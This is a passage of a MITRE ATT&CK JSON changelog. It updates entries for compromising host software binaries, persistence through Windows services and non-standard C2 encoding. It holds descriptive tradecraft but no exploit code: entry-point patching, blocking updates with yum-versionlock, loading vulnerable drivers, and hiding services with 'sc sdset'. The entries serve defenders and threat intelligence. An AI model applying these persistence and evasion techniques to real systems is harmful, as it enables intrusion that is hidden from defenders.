Cloud Mandiant UNC3886 2024)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1554",
                            "external_id": "T1554"
                        },
                        {
                            "source_name": "Google Cloud Mandiant UNC3886 2024",
                            "description": " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert: Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations"
                        },
                        {
                            "source_name": "Unit42 Banking Trojans Hooking 2022",
                            "description": "Or Chechik. (2022, October 31). Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure. Retrieved September 27, 2023.",
                            "url": "https://unit42.paloaltonetworks.com/banking-trojan-techniques/#post-125550-_rm3d6xxbk52n"
                        },
                        {
                            "source_name": "ESET FontOnLake Analysis 2021",
                            "description": "Vladislav Hr\u010dka. (2021, January 1). FontOnLake. Retrieved September 27, 2023.",
                            "url": "https://web-assets.esetstatic.com/wls/2021/10/eset_fontonlake.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "CrowdStrike Falcon OverWatch",
                        "Liran Ravich, CardinalOps",
                        "Jamie Williams (U \u03c9 U), PANW Unit 42"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.2",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 18:57:08.883000+00:00\", \"old_value\": \"2025-10-24 17:49:07.572000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.\\n\\nAdversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)\\n\\nAn adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary\\u2019s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)\\n\\nAfter modifying a binary, an adversary may attempt to impair defenses by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)\", \"old_value\": \"Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.\\n\\nAdversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)\\n\\nAn adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary\\u2019s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)\\n\\nAfter modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)\", \"diff\": \"--- \\n+++ \\n@@ -4,4 +4,4 @@\\n \\n An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary\\u2019s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)\\n \\n-After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)\\n+After modifying a binary, an adversary may attempt to impair defenses by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "2.2",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to8__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to8__0\"><a href=\"#difflib_chg_to8__top\">t</a></td><td class=\"diff_header\" id=\"from8_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;modify&nbsp;host&nbsp;software&nbsp;binaries&nbsp;to&nbsp;establish&nbsp;p</td><td class=\"diff_next\"><a href=\"#difflib_chg_to8__top\">t</a></td><td class=\"diff_header\" id=\"to8_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;modify&nbsp;host&nbsp;software&nbsp;binaries&nbsp;to&nbsp;establish&nbsp;p</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ersistent&nbsp;access&nbsp;to&nbsp;systems.&nbsp;Software&nbsp;binaries/executables&nbsp;p</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ersistent&nbsp;access&nbsp;to&nbsp;systems.&nbsp;Software&nbsp;binaries/executables&nbsp;p</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rovide&nbsp;a&nbsp;wide&nbsp;range&nbsp;of&nbsp;system&nbsp;commands&nbsp;or&nbsp;services,&nbsp;programs</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rovide&nbsp;a&nbsp;wide&nbsp;range&nbsp;of&nbsp;system&nbsp;commands&nbsp;or&nbsp;services,&nbsp;programs</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;and&nbsp;libraries.&nbsp;Common&nbsp;software&nbsp;binaries&nbsp;are&nbsp;SSH&nbsp;clients,&nbsp;F</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;and&nbsp;libraries.&nbsp;Common&nbsp;software&nbsp;binaries&nbsp;are&nbsp;SSH&nbsp;clients,&nbsp;F</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">TP&nbsp;clients,&nbsp;email&nbsp;clients,&nbsp;web&nbsp;browsers,&nbsp;and&nbsp;many&nbsp;other&nbsp;user</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">TP&nbsp;clients,&nbsp;email&nbsp;clients,&nbsp;web&nbsp;browsers,&nbsp;and&nbsp;many&nbsp;other&nbsp;user</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;or&nbsp;server&nbsp;applications.&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;establish&nbsp;persiste</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;or&nbsp;server&nbsp;applications.&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;establish&nbsp;persiste</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nce&nbsp;though&nbsp;modifications&nbsp;to&nbsp;host&nbsp;software&nbsp;binaries.&nbsp;For&nbsp;exam</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nce&nbsp;though&nbsp;modifications&nbsp;to&nbsp;host&nbsp;software&nbsp;binaries.&nbsp;For&nbsp;exam</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ple,&nbsp;an&nbsp;adversary&nbsp;may&nbsp;replace&nbsp;or&nbsp;otherwise&nbsp;infect&nbsp;a&nbsp;legitima</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ple,&nbsp;an&nbsp;adversary&nbsp;may&nbsp;replace&nbsp;or&nbsp;otherwise&nbsp;infect&nbsp;a&nbsp;legitima</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">te&nbsp;application&nbsp;binary&nbsp;(or&nbsp;support&nbsp;files)&nbsp;with&nbsp;a&nbsp;backdoor.&nbsp;Si</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">te&nbsp;application&nbsp;binary&nbsp;(or&nbsp;support&nbsp;files)&nbsp;with&nbsp;a&nbsp;backdoor.&nbsp;Si</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nce&nbsp;these&nbsp;binaries&nbsp;may&nbsp;be&nbsp;routinely&nbsp;executed&nbsp;by&nbsp;applications</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nce&nbsp;these&nbsp;binaries&nbsp;may&nbsp;be&nbsp;routinely&nbsp;executed&nbsp;by&nbsp;applications</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;or&nbsp;the&nbsp;user,&nbsp;the&nbsp;adversary&nbsp;can&nbsp;leverage&nbsp;this&nbsp;for&nbsp;persistent</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;or&nbsp;the&nbsp;user,&nbsp;the&nbsp;adversary&nbsp;can&nbsp;leverage&nbsp;this&nbsp;for&nbsp;persistent</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;access&nbsp;to&nbsp;the&nbsp;host.&nbsp;An&nbsp;adversary&nbsp;may&nbsp;also&nbsp;modify&nbsp;a&nbsp;software</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;access&nbsp;to&nbsp;the&nbsp;host.&nbsp;An&nbsp;adversary&nbsp;may&nbsp;also&nbsp;modify&nbsp;a&nbsp;software</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;binary&nbsp;such&nbsp;as&nbsp;an&nbsp;SSH&nbsp;client&nbsp;in&nbsp;order&nbsp;to&nbsp;persistently&nbsp;colle</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;binary&nbsp;such&nbsp;as&nbsp;an&nbsp;SSH&nbsp;client&nbsp;in&nbsp;order&nbsp;to&nbsp;persistently&nbsp;colle</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ct&nbsp;credentials&nbsp;during&nbsp;logins&nbsp;(i.e.,&nbsp;[Modify&nbsp;Authentication&nbsp;P</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ct&nbsp;credentials&nbsp;during&nbsp;logins&nbsp;(i.e.,&nbsp;[Modify&nbsp;Authentication&nbsp;P</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rocess](https://attack.mitre.org/techniques/T1556)).(Citatio</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rocess](https://attack.mitre.org/techniques/T1556)).(Citatio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n:&nbsp;Google&nbsp;Cloud&nbsp;Mandiant&nbsp;UNC3886&nbsp;2024)&nbsp;&nbsp;An&nbsp;adversary&nbsp;may&nbsp;als</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n:&nbsp;Google&nbsp;Cloud&nbsp;Mandiant&nbsp;UNC3886&nbsp;2024)&nbsp;&nbsp;An&nbsp;adversary&nbsp;may&nbsp;als</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">o&nbsp;modify&nbsp;an&nbsp;existing&nbsp;binary&nbsp;by&nbsp;patching&nbsp;in&nbsp;malicious&nbsp;functio</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">o&nbsp;modify&nbsp;an&nbsp;existing&nbsp;binary&nbsp;by&nbsp;patching&nbsp;in&nbsp;malicious&nbsp;functio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nality&nbsp;(e.g.,&nbsp;IAT&nbsp;Hooking/Entry&nbsp;point&nbsp;patching)(Citation:&nbsp;Un</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nality&nbsp;(e.g.,&nbsp;IAT&nbsp;Hooking/Entry&nbsp;point&nbsp;patching)(Citation:&nbsp;Un</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">it42&nbsp;Banking&nbsp;Trojans&nbsp;Hooking&nbsp;2022)&nbsp;prior&nbsp;to&nbsp;the&nbsp;binary\u2019s&nbsp;leg</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">it42&nbsp;Banking&nbsp;Trojans&nbsp;Hooking&nbsp;2022)&nbsp;prior&nbsp;to&nbsp;the&nbsp;binary\u2019s&nbsp;leg</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itimate&nbsp;execution.&nbsp;For&nbsp;example,&nbsp;an&nbsp;adversary&nbsp;may&nbsp;modify&nbsp;the&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">itimate&nbsp;execution.&nbsp;For&nbsp;example,&nbsp;an&nbsp;adversary&nbsp;may&nbsp;modify&nbsp;the&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">entry&nbsp;point&nbsp;of&nbsp;a&nbsp;binary&nbsp;to&nbsp;point&nbsp;to&nbsp;malicious&nbsp;code&nbsp;patched&nbsp;i</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">entry&nbsp;point&nbsp;of&nbsp;a&nbsp;binary&nbsp;to&nbsp;point&nbsp;to&nbsp;malicious&nbsp;code&nbsp;patched&nbsp;i</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;by&nbsp;the&nbsp;adversary&nbsp;before&nbsp;resuming&nbsp;normal&nbsp;execution&nbsp;flow.(Ci</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;by&nbsp;the&nbsp;adversary&nbsp;before&nbsp;resuming&nbsp;normal&nbsp;execution&nbsp;flow.(Ci</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tation:&nbsp;ESET&nbsp;FontOnLake&nbsp;Analysis&nbsp;2021)&nbsp;&nbsp;After&nbsp;modifying&nbsp;a&nbsp;bi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tation:&nbsp;ESET&nbsp;FontOnLake&nbsp;Analysis&nbsp;2021)&nbsp;&nbsp;After&nbsp;modifying&nbsp;a&nbsp;bi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nary,&nbsp;an&nbsp;adversary&nbsp;may&nbsp;attempt&nbsp;to&nbsp;<span class=\"diff_chg\">[Impair&nbsp;Defenses]</span>(<span class=\"diff_chg\">https://</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nary,&nbsp;an&nbsp;adversary&nbsp;may&nbsp;attempt&nbsp;to&nbsp;<span class=\"diff_chg\">impair&nbsp;defenses&nbsp;by&nbsp;prevent</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">attack.mitre.org/techniques/T1562)&nbsp;by&nbsp;pre</span>v<span class=\"diff_chg\">enting&nbsp;it&nbsp;from&nbsp;upd</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">ing&nbsp;it&nbsp;from&nbsp;updating&nbsp;</span>(<span class=\"diff_chg\">e.g.,&nbsp;</span>v<span class=\"diff_chg\">ia&nbsp;the</span>&nbsp;`yum-versionlock`&nbsp;comman</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">ating&nbsp;(e.g.,&nbsp;via&nbsp;the</span>&nbsp;`yum-versionlock`&nbsp;command&nbsp;or&nbsp;`versionlo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">d&nbsp;or&nbsp;`versionlock.list`&nbsp;file&nbsp;in&nbsp;Linux&nbsp;systems&nbsp;that&nbsp;use&nbsp;the&nbsp;y</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ck.list`&nbsp;file&nbsp;in&nbsp;Linux&nbsp;systems&nbsp;that&nbsp;use&nbsp;the&nbsp;yum&nbsp;package&nbsp;mana</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">um&nbsp;package&nbsp;manager).(Citation:&nbsp;Google&nbsp;Cloud&nbsp;Mandiant&nbsp;UNC3886</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ger).(Citation:&nbsp;Google&nbsp;Cloud&nbsp;Mandiant&nbsp;UNC3886&nbsp;2024)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;2024)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1045: Code Signing"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0336: Detect Compromise of Host Software Binaries"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-17 19:13:50.402000+00:00",
                    "modified": "2026-04-23 18:48:07.774000+00:00",
                    "name": "Windows Service",
                    "description": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.\n\nAdversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. \n\nAdversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as \"Bring Your Own Vulnerable Driver\" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)\n\nServices may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002).\n\nTo make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create \u2018hidden\u2019 services (i.e., [Hide Artifacts](https://attack.mitre.org/techniques/T1564)), for example by using the `sc sdset` command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.(Citation: SANS 1)(Citation: SANS 2)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1543/003",
                            "external_id": "T1543.003"
                        },
                        {
                            "source_name": "Microsoft Windows Event Forwarding FEB 2018",
                            "description": "Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018.",
                            "url": "https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection"
                        },
                        {
                            "source_name": "ESET InvisiMole June 2020",
                            "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.",
                            "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"
                        },
                        {
                            "source_name": "SANS 1",
                            "description": "Joshua Wright. (2020, October 13). Retrieved March 22, 2024.",
                            "url": "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/"
                        },
                        {
                            "source_name": "SANS 2",
                            "description": "Joshua Wright. (2020, October 14). Retrieved March 22, 2024.",
                            "url": "https://www.sans.org/blog/defense-spotlight-finding-hidden-windows-services/"
                        },
                        {
                            "source_name": "TechNet Services",
                            "description": "Microsoft. (n.d.). Services. Retrieved June 7, 2016.",
                            "url": "https://technet.microsoft.com/en-us/library/cc772408.aspx"
                        },
                        {
                            "source_name": "Microsoft 4697 APR 2017",
                            "description": "Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018.",
                            "url": "https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697"
                        },
                        {
                            "source_name": "Symantec W.32 Stuxnet Dossier",
                            "description": "Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.",
                            "url": "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf"
                        },
                        {
                            "source_name": "Unit42 AcidBox June 2020",
                            "description": "Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021.",
                            "url": "https://unit42.paloaltonetworks.com/acidbox-rare-malware/"
                        },
                        {
                            "source_name": "TechNet Autoruns",
                            "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.",
                            "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"
                        },
                        {
                            "source_name": "Crowdstrike DriveSlayer February 2022",
                            "description": "Thomas, W. et al. (2022, February 25). CrowdStrike Falcon Protects from New Wiper Malware Used in Ukraine Cyberattacks. Retrieved March 25, 2022.",
                            "url": "https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Matthew Demaske, Adaptforward",
                        "Pedro Harrison",
                        "Mayuresh Dani, Qualys",
                        "Wietze Beukema @Wietze",
                        "Akshat Pradhan, Qualys",
                        "Wirapong Petshagun"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.6",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:48:07.774000+00:00\", \"old_value\": \"2025-10-24 17:48:33.408000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_contributors'][3]\": {\"new_value\": \"Wietze Beukema @Wietze\", \"old_value\": \"Wietze Beukema, @wietze\"}}}",
                    "previous_version": "1.6",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1028: Operating System Configuration",
                            "M1040: Behavior Prevention on Endpoint",
                            "M1045: Code Signing",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0552: Detection of Windows Service Creation or Modification"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-14 23:39:50.117000+00:00",
                    "modified": "2026-04-21 18:10:25.277000+00:00",
                    "name": "Non-Standard Encoding",
                    "description": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "command-and-control"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1132/002",
                            "external_id": "T1132.002"
                        },
                        {
                            "source_name": "Wikipedia Binary-to-text Encoding",
                            "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.",
                            "url": "https://en.wikipedia.org/wiki/Binary-to-text_encoding"
                        },
                        {
                            "source_name": "Wikipedia Character Encoding",
                            "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.",
                            "url": "https://en.wikipedia.org/wiki/Character_encoding"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
